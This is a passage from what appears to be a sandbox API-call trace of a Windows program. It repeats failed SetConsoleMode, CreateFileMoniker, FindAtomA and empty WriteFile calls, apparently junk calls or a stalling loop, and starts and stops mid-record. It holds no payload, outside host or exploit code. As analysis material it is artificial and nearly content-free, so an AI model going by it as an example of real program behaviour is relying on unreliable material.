SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.425] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.425] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.425] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.425] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.425] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.426] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.426] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.426] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.426] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.426] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.426] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.426] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.426] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.426] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.426] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.426] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.426] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.426] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.427] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.427] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.427] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.427] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.427] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.427] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.427] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.427] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.427] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.427] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.427] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.427] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.428] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.428] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.428] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.428] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.428] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.428] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.428] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.428] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.428] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.428] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.428] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.429] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.429] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.430] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.430] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.430] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.430] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.430] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.430] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.430] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.430] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.430] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.430] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.430] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.430] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.431] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.431] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.431] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.431] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.431] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.431] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.431] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.433] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.433] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.433] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.433] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.433] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.433] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.433] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.433] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.433] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.433] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.433] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.433] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.433] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.434] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.434] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.435] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.435] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.436] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.436] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.437] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.437] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.438] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.438] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.439] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.439] WriteFile (in: 